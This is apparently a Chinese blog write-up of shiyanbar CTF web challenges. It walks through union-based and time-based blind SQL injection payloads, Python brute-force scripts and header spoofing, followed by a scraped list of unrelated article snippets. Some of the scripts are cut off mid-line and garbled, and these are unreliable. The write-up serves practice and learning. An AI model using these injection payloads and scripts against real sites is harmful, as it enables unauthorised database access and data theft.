解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1

真的很简单,就是最简单的sql注入,什么都没有过滤.直接union联合查询就行了.唯一有点遗憾的的就是,一开始一直尝试带带单引号的语句,例如1' or ''=',没有什么发现.最后才意识到sql这个sql查询语句可能是没有单引号的,一试果然没有.

http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_name,column_name from information_schema.columns

从information_schema.columns

表里查询所有表名和列名,可能有点难受的就是返回的数据有点多,只能ctrl+f搜索,flag或key关键字,发现thiskey表里k0y字段.

于是http://ctf5.shiyanbar.com/8/index.php?id=1 union select k0y from thiskey

发现没有返回结果,尴尬.仔细看看,此处sql查询返回的结果是要有两列的,所以http://ctf5.shiyanbar.com/8/index.php?id=1 union select k0y,1 from thiskey

得到flag.

总结就是有的sql查询语句是没有单引号的,所以是1 or 1=1而不是1' or '1'='1,而且用union联合查询时注意查询返回的列数要和原查询一致.

貌似有点难

不多说,去看题目吧。

解题链接: http://ctf5.shiyanbar.com/phpaudit/

就是在请求中加一个x-forwarded-for:1.1.1.1就行.

头有点大

提示都这么多了,再提示就没意思了。

解题链接: http://ctf5.shiyanbar.com/sHeader/

Please make sure you have installed .net framework 9.9!

Make sure you are in the region of England and browsing this site with Internet Explorer
三个要求:安装.net framework 9.9,区域是英国,使用ie访问.

使用ie访问,修改user-agent头为Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko

区域是英国,修改Accept-Language 为,en-gb划重点,这里我本来修改为en-GB,并不能得到flag,gb必须小写.

安装. net framework 9.9,就是在user-agent头的小括号内添加一句.NET CLR 9.9,最后user-agent就是Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0;.NET CLR 9.9) like Gecko

总结就是安装. net framework 9.9,就是在user-agent头的小括号内添加一句.NET CLR 9.9,并且en-gb的gb要求小写(en-GB在一些题里可能是可以识别的.)

看起来有点难

切,你那水平也就这么点了,这都是什么题啊!!!

解题链接: http://ctf5.shiyanbar.com/basic/inject

sql注入题,粗心没做出来也是很遗憾。

两个输入框进行了一遍fuzzing测试,user框过滤了select,pass框什么都没过滤.

没有回显,报错也是固定格式.那就只能布尔或时间盲注.其实用1' or sleep(3) and ''='就会发现存在延时.要想办法绕过对select的过滤才行,不然就只能用substr(database(),start,length)得到数据库名,表名列名得不到.
于是,SELECT,SEselectlect,seSELEctleCT,/*!select*/,甚至\Nselect,E0select,都是弹出"sql注入攻击",那就很绝望.
其实我是察觉到题里的提示的,
响应页面有一行用来输出你输入的用户名,你输入/*!select*/,/*!SELECT*/,虽然都弹出"sql注入攻击",但
响应中一个是/*!*/,一个是/*!SELECT*/,如下图所示:

ctf实验吧_第3张图片

 

ctf实验吧_第4张图片

这表明SELECT是没被替换成空的,换句话说,SELECT很可能是有作用的,但我接下来是使用布尔盲注证明SELECt是有作用的,
就是假设SELECT没被过滤,照常用布尔盲注,输出响应长度,期待会有一个不同的长度输出,结果有了好几个不同的长度输出,
我的耐心被消磨殆尽.事实证明,此时应该用时间盲注来证明SELECT是有用的.基于布尔去判断,它输出几个不同的
长度,头都大了.基于时间盲注就更好,1' or (SELECT case when 1 then sleep(3) else sleep(0) end) and 'a'='a,SELECT如果有用,会直接延时.
1' or if(1,sleep(3),sleep(0)) and ''='会延时三秒.那就直接假设SELECT是有用的进行基于时间的盲注.
事实证明确实如此,SELECT是有用的.

 

报表名:

import requests
#url,range,id,data
def payload(rawstr):
   pass
url=r'http://ctf5.shiyanbar.com/web/earnest/index.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz@'
for i in range(1,20):
    for j in dic:
        url = r"http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1' or if(ord((SELECT mid(group_concat(table_name separator '@') from {0} for 1) from information_schema.tables where table_schema=database() limit 1))={1},sleep(6),sleep(0)) or '1'='&pass=2&action=login".format(i,ord(j))
        s=requests.get(url)
        #content=s.content

      #  length=len(content)
       # print(content.decode('GB2312'))
        #print(j)
       # print(length)
        sec=s.elapsed.seconds
        if sec > 6:
            string+=j
            break
    print (string)

报列名:

import requests
#url,range,id,data
def payload(rawstr):
   pass
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz{}()`~!#$%^&*-=_+{}[];\',./:"?> 6:
            string+=j
            break
    print (string)

得到username和password列分别报内容:

import requests
#url,range,id,data
def payload(rawstr):
   pass
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz{}()`~!#$%^&*-=_+{}[];\',./:"?> 10:
            string+=j
            break
    print (string)
import requests
#url,range,id,data
def payload(rawstr):
   pass
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz{}()`~!#$%^&*-=_+{}[];\',./:"?> 10:
            string+=j
            break
    print (string)

 

你可能感兴趣的:(ctf实验吧)

  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • react-intl——react国际化使用方案 苹果酱0567 面试题汇总与解析java开发语言中间件springboot后端
    国际化介绍i18n:internationalization国家化简称,首字母+首尾字母间隔的字母个数+尾字母,类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • Windows安装ciphey编码工具,附一道ciscn编码题例 im-Miclelson CTF工具网络安全
    TA是什么一款智能化的编码分析解码工具,对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位(最新的版本不兼容,32位的也不行)PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件,r修改成rb即可。使用标准语
  • 2005年高考英语北京卷 - 阅读理解C 让文字更美
    Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢?Zooofficialssaytheyareconcernedab
  • CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移 沧海一粟日尽其用 算法安全python
    CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息:7+1+0?格式bugku{xxxxx}密文:4nXna/V7t2LpdLI44mn0fQ==要求:破解密文获得flag2.解题思路2.1base64
  • CTF常见编码及加解密(超全)第二篇 不会代码的小徐 编码密码网络安全密码学预编码
    HTML实体编码简述:字符实体是用一个编号写入HTML代码中来代替一个字符,在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例:highlighter-HTML明文:hello,world.十进制:hello,world.十六进制:hel
  • CTF——web方向学习攻略 一则孤庸 CTF网络安全CTF
    1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
  • CTF——web总结 oliveira-time ctfweb安全
    解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息(base64)不管三七二十一先扫描目录再说ps:正常的应该是先扫描目录,然后发现后台进行爆破,发现爆破困难,然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客
  • VueTreeselect el-tree-select 多选 小小并不小 Vueelementjsvue.jsjavascript
    1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs
  • ctf逆向解题——Bomb二进制炸弹 Funkypantss
    BombPhase1在输入阶段将由文件输入的字符存储在input中,在phase1,该阶段将原字符串存储到rdi中,调用pases_1函数进行字符串比较。image进入phase1函数,该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”(存储在rsi中)进行比较,用于比较的函数是strings_not_equal,
  • 【CTF】MISC常用工具集锦/使用方法简介 不会代码的小徐 misc网络安全测试工具
    前言#MISC题型多变而且工具繁杂,因此自己花时间整理了一份工具列表,以便日后参考用流畅地阅读这篇博客,你可能需要:Python2.7.18+Python3.8+任何一个更高版本的Python,使用conda管理Linux虚拟机,kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?),整合了多种脚本(base,字频分析,pn
  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能? 网安学习 web安全安全网络安全的相关比赛有哪
    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
  • 第四部分:1---文件内核对象,文件描述符,输出重定向 S+叮当猫 LinuxCentOS算法linux服务器
    目录structfile内核对象:如何读写文件?文件描述符在文件描述符表中的分配规则:输出重定向初步解析:dup2实现复制文件描述符:structfile内核对象:structfile是在内核空间中创建的用于描述文件的结构体,每当一个文件被打开时,内核会为该文件创建一个对应的structfile结构体,并在文件描述符表中为其分配一个文件描述符。基于文件的定义(文件=内容+属性),structfil
  • 网络攻防WEB入门指南 youhao108 网络攻防web渗透测试网络安全网络攻防
    网络攻防WEB入门指南(大佬绕路)文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题,以及线下AWD攻防(AttackWith
  • 软考 - 系统架构设计师 - 设计模式 小林想被监督学习 系统架构设计师系统架构设计模式
    目录概念创建型设计模式抽象工厂模式(AbstractFactoryPattern)优点缺点应用场景总结构建器模式(BuilderPattern)优点缺点应用场景工厂方法模式(factorymethod)优点缺点应用场景原型模式(prototype)优点缺点应用场景单例模式(Singleton)优点缺点应用场景结构型设计模式适配器模式(Adapter)优点缺点应用场景桥接模式(Bridge)优点缺点
  • ctfshow web入门 ssrf web351~web360 kikkeve ctfshowphpweb安全安全
    目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源,因为我们远程请求不到。curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取
  • flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包 Sindyue flutter
    1.build.gradle文件中配置不同的应用信息flavorDimensions"app"productFlavors{app1{//配置包名manifestPlaceholders=[str:"releaseStr",package_name:"com.example.demo1"]applicationId"com.example.demo1"versionCode1versionName
  • CTF 竞赛密码学方向学习路径规划 David Max CTF学习笔记密码学ctf信息安全
    目录计算机科学基础计算机科学概念的引入、兴趣的引导开发环境的配置与常用工具的安装WattToolkit(Steam++)、机场代理Scoop(Windows用户可选)常用Python库SageMathLinux小工具yafuOpenSSLMarkdown编程基础Python其他编程语言、算法与数据结构(可选)数学基础离散数学与抽象代数复杂性分析密码学的正式学习兴趣的培养做题小技巧系统学习需要了解并
  • MySQL8.0新特性~最左前缀匹配原则被打破了 进击的CJR mysqlmysql
    测试在MySQL8.0.25和mysql5.7.33中创建如下CREATETABLEt1(f1INTNOTNULL,f2INTNOTNULL,PRIMARYKEY(f1,f2));INSERTINTOt1VALUES(1,1),(1,2),(1,3),(1,4),(1,5),(2,1),(2,2),(2,3),(2,4),(2,5);INSERTINTOt1SELECTf1,f2+5FROMt1;
  • 穴位贴遇水后也会黑,面对质疑我们来做个实验 有空一起玩手机
    有些人质疑,你们的穴位贴遇水后也会黑,面对质疑我们来做个实验吧,让事实说话!看下面9图,不管是冷水浸泡,还是热水浸泡,都不会比一晚足底贴敷黏和黑,水里拿出来也不会有油脂,因为身体的湿气不只是水,还有混合毒素的粘稠物质,实验证明穴位贴确实有排毒去湿的效果!
  • hackcon ctf 2018 | pwn wp fantasy_learner
    BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点,得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出,输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久,卡在了能否根据_d
  • BUUCTF 2021-10-4 Pwn Ch1lkat BUUCTFPwnlinuxpwn
    文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
  • C# 关于多线程同步不同实现方式 語衣 C#知识补充c#开发语言
    栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva
  • Android里的设计模式 jim_dayday_up #Android_基础知识设计模式java开发语言
    一:设计模式分类经典的23种设计模式是由ErichGamma、RichardHelm、RalphJohnson和JohnVlissides(合称“GangofFour”)在他们的书《设计模式:可复用面向对象软件的基础》中定义的。以下是这些设计模式的分类和简要介绍。1.1创建型模式单例模式(Singleton):确保一个类只有一个实例,并提供一个全局访问点。抽象工厂模式(AbstractFactor
  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • 【软考】设计模式之抽象工厂模式 王佑辉 软考设计模式软考
    目录1.说明2.应用场景3.结构图4.构成5.适用性6.优点7.缺点8.java示例1.说明1.提供一个创建一系列相关或相互依赖对象的接口,而无须指定它们具体的类。2.抽象工厂模式(AbstractFactoryPattern)是一种创建型设计模式。3.抽象工厂模式用于系统的产品族,而不仅仅是一个等级结构;一个等级的抽象类只能创建一个等级的产品,而抽象工厂模式能创建多个等级的产品。2.应用场景1.
  • 30、基于SelectFromModel和LassoCV的特征选择 凌晨思索
    30、基于SelectFromModel和LassoCV的特征选择importmatplotlib.pyplotaspltimportnumpyasnpfromsklearn.datasetsimportload_diabetesfromsklearn.feature_selectionimportSelectFromModelfromsklearn.linear_modelimportLasso
  • 【鸿蒙HarmonyOS开发笔记】使用@Preview装饰器预览组件 Luxine. 鸿蒙HarmonyOS开发笔记前端分享笔记华为harmonyos
    概述ArkTS应用/服务支持组件预览,要求compileSdkVersion为8或以上。组件预览支持实时预览,不支持动态图和动态预览。组件预览通过在组件前添加注解@Preview实现,在单个源文件中,最多可以使用10个@Preview装饰自定义组件。@Preview的使用参考如下示例@Preview({title:'FoodImage'})@ComponentstructFoodImageDisp
  • vue3+tesseract 图片文字提取 妙明元心 javascriptvue.jsecmascript
    github:https://github.com/naptha/tesseract.js可实现多语言识别,中英文混合识别demo如下:importTesseractfrom"tesseract.js"//方式1:Tesseract.recognize('http://localhost:5173/vue.jpg','eng+chi_sim',).then((d)=>{console.log(d.
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他